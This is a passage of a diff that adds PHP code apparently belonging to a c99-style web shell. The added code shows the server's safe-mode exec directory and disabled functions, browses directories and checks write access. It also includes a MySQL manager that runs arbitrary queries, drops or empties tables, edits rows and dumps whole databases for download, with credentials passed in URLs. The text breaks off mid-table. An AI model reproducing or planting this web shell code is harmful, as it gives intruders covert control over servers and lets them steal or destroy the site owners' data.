+echo "<tr><td colspan=2>\n";
+echo get_status();
+echo "</td></tr>\n";
+echo "<tr><td colspan=2>\n";
+echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir."<br>\n" : "";
+echo showdisfunc() ? "DisFunc: ".showdisfunc()."\n" : "";
+echo "</td></tr>\n";
+echo "<tr><td colspan=2 id=mainmenu>\n";
+if (count($quicklaunch2) > 0) {
+  foreach($quicklaunch2 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td>\n".
+     "<tr><td colspan=2 id=mainmenu>\n";
+if (count($quicklaunch1) > 0) {
+  foreach($quicklaunch1 as $item) {
+    $item[1] = str_replace("%d",urlencode($d),$item[1]);
+    $item[1] = str_replace("%sort",$sort,$item[1]);
+    $v = realpath($d."..");
+    if (empty($v)) {
+      $a = explode(DIRECTORY_SEPARATOR,$d);
+      unset($a[count($a)-2]);
+      $v = join(DIRECTORY_SEPARATOR,$a);
+    }
+    $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+    echo "<a href=\"".$item[1]."\">".$item[0]."</a>\n";
+  }
+}
+echo "</td></tr>\n<tr><td colspan=2>";
+echo "<p class=fleft>\n";
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b) {
+  $t = ""; $j = 0;
+  foreach ($e as $r) {
+    $t.= $r.DIRECTORY_SEPARATOR;
+    if ($j == $i) { break; }
+    $j++;
+  }
+  echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><font color=yellow>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</font></a>\n";
+  $i++;
+}
+echo " - ";
+if (is_writable($d)) {
+  $wd = TRUE;
+  $wdt = "<font color=#00FF00>[OK]</font>";
+  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else {
+  $wd = FALSE;
+  $wdt = "<font color=red>[Read-Only]</font>";
+  echo "<b>".view_perms_color($d)."</b>";
+}
+echo "\n</p>\n";
+?>
+<div class=fright>
+<form method="POST"><input type=hidden name=act value="ls">
+Directory: <input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type=submit value="Go">
+</form>
+</div>
+</td></tr></table>
+<?php
+/***********************/
+/** INFORMATION TABLE **/
+/***********************/
+echo "<table id=maininfo><tr><td width=\"100%\">\n";
+if ($act == "") { $act = $dspact = "ls"; }
+if ($act == "sql") {
+  $sql_surl = $surl."act=sql";
+  if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+  if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+  if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+  if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+  if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+  $sql_surl .= "&";
+  echo "<h4>Attention! MySQL Manager is <u>NOT</u> a ready module! Don't reports bugs.</h4>".
+       "<table>".
+       "<tr><td width=\"100%\" colspan=2 class=barheader>";
+  if ($sql_server) {
+    $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+    $err = mysql_smarterror();
+    @mysql_select_db($sql_db,$sql_sock);
+    if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+  }
+  else {$sql_sock = FALSE;}
+  echo ".: SQL Manager :.<br>";
+  if (!$sql_sock) {
+    if (!$sql_server) {echo "NO CONNECTION";}
+    else {echo "Can't connect! ".$err;}
+  }
+  else {
+    $sqlquicklaunch = array();
+    $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+    $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+    $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+    $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+    $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+    $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+    echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
+    if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+  }
+  echo "</td></tr><tr>";
+  if (!$sql_sock) {
+    echo "<td width=\"28%\" height=\"100\" valign=\"top\"><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width=\"90%\" height=1 valign=\"top\">";
+    echo "<table width=\"100%\" border=0><tr><td><b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b></td><td><b>Database</b></td></tr><form action=\" $surl \" method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><tr><td><input type=\"text\" name=\"sql_login\" value=\"root\" maxlength=\"64\"></td><td><input type=\"password\" name=\"sql_passwd\" value=\"\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_db\" value=\"\" maxlength=\"64\"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type=\"text\" name=\"sql_server\" value=\"localhost\" maxlength=\"64\"></td><td><input type=\"text\" name=\"sql_port\" value=\"3306\" maxlength=\"6\" size=\"3\"></td><td><input type=\"submit\" value=\"Connect\"></td></tr><tr><td></td></tr></form></table></td>";
+  }
+  else {
+    //Start left panel
+    if (!empty($sql_db)) {
+      ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_tables($sql_db);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+        $c = 0;
+        while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+        if (!$c) {echo "No tables found in database.";}
+      }
+    }
+    else {
+      ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade>
+      <?php
+      $result = mysql_list_dbs($sql_sock);
+      if (!$result) {echo mysql_smarterror();}
+      else {
+        ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db">
+        <?php
+        $c = 0;
+        $dbs = "";
+        while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+        echo "<option value=\"\">Databases (".$c.")</option>";
+        echo $dbs;
+      }
+      ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form>
+      <?php
+    }
+    //End left panel
+    echo "</td><td width=\"100%\">";
+    //Start center panel
+    $diplay = TRUE;
+    if ($sql_db) {
+      if (!is_numeric($c)) {$c = 0;}
+      if ($c == 0) {$c = "no";}
+      echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+      if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+      echo "</b></center>";
+      $acts = array("","dump");
+      if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+
+      elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+      elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+      elseif ($sql_tbl_act == "insert") {
+        if ($sql_tbl_insert_radio == 1) {
+          $keys = "";
+          $akeys = array_keys($sql_tbl_insert);
+          foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+          if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+          $values = "";
+          $i = 0;
+          foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+          if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+          $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+        elseif ($sql_tbl_insert_radio == 2) {
+          $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+          $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+          $result = mysql_query($sql_query) or print(mysql_smarterror());
+          $result = mysql_fetch_array($result, MYSQL_ASSOC);
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+      }
+      if ($sql_act == "query") {
+        echo "<hr size=\"1\" noshade>";
+        if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+        if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+        if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+      }
+      if (in_array($sql_act,$acts)) {
+        ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="newtbl">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
+        <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
+        <input type="text" name="sql_newtbl" size="20">
+        <input type="submit" value="Create">
+        </form></td>
+        <td width="30%" height="1"><b>Dump DB:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="dump">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+        <?php
+        if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+        if ($sql_act == "newtbl") {
+          echo "<b>";
+          if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
+            echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+          }
+          else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+        }
+        elseif ($sql_act == "dump") {
+          if (empty($submit)) {
+            $diplay = FALSE;
+            echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+            echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+            $v = join (";",$dmptbls);
+            echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+            if ($dump_file) {$tmp = $dump_file;}
+            else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+            echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+            echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+            echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+            echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+            echo "</form>";
+          }
+          else {
+            $diplay = TRUE;
+            $set = array();
+            $set["sock"] = $sql_sock;
+            $set["db"] = $sql_db;
+            $dump_out = "download";
+            $set["print"] = 0;
+            $set["nl2br"] = 0;
+            $set[""] = 0;
+            $set["file"] = $dump_file;
+            $set["add_drop"] = TRUE;
+            $set["onlytabs"] = array();
+            if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+            $ret = mysql_dump($set);
+            if ($sql_dump_download) {
+              @ob_clean();
+              header("Content-type: application/octet-stream");
+              header("Content-length: ".strlen($ret));
+              header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+              echo $ret;
+              exit;
+            }
+            elseif ($sql_dump_savetofile) {
+              $fp = fopen($sql_dump_file,"w");
+              if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+              else {
+                fwrite($fp,$ret);
+                fclose($fp);
+                echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+              }
+            }
+            else {echo "<b>Dump: nothing to do!</b>";}
+          }
+        }
+        if ($diplay) {
+    if (!empty($sql_tbl)) {
+      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+      $count_row = mysql_fetch_array($count);
+      mysql_free_result($count);
+      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+      $tbl_struct_fields = array();
+      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+      $perpage = $sql_tbl_le - $sql_tbl_ls;
+      if (!is_numeric($perpage)) {$perpage = 10;}
+      $numpages = $count_row[0]/$perpage;
+      $e = explode(" ",$sql_order);
+      if (count($e) == 2) {
+        if ($e[0] == "d") {$asc_desc = "DESC";}
+        else {$asc_desc = "ASC";}
+        $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+      }
+      else {$v = "";}
+      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+      $result = mysql_query($query) or print(mysql_smarterror());
+      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+      if ($sql_tbl_act == "insert") {
+        if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+        if (!empty($sql_tbl_insert_radio)) {  } //Not Ready
+        else {
+          echo "<br><br><b>Inserting row into table:</b><br>";
+          if (!empty($sql_tbl_insert_q)) {
+            $sql_query = "SELECT * FROM `".$sql_tbl."`";
+            $sql_query .= " WHERE".$sql_tbl_insert_q;
+            $sql_query .= " LIMIT 1;";
+            $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+            $values = mysql_fetch_assoc($result);
+            mysql_free_result($result);
+          }
+          else {$values = array();}
+          echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+          foreach ($tbl_struct_fields as $field) {
+            $name = $field["Field"];
+            if (empty($sql_tbl_insert_q)) {$v = "";}
+            echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+            $i++;
+          }
+          echo "</table><br>";
+          echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+          if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+          echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+        }
+      }
+      if ($sql_tbl_act == "browse") {
+        $sql_tbl_ls = abs($sql_tbl_ls);
+        $sql_tbl_le = abs($sql_tbl_le);
+        echo "<hr size=\"1\" noshade>";
+        echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+        $b = 0;
+        for($i=0;$i<$numpages;$i++) {
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+          echo $i;
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+          if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+          else {echo "&nbsp;";}
+        }
+        if ($i == 0) {echo "empty";}
+        echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+        echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
+        echo "<tr>";
+        echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+        for ($i=0;$i<mysql_num_fields($result);$i++) {
+          $v = mysql_field_name($result,$i);
+          if ($e[0] == "a") {$s = "d"; $m = "asc";}
+          else {$s = "a"; $m = "desc";}
+          echo "<td>";
+          if (empty($e[0])) {$e[0] = "a";}
+          if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+          else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+          echo "</td>";
+        }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
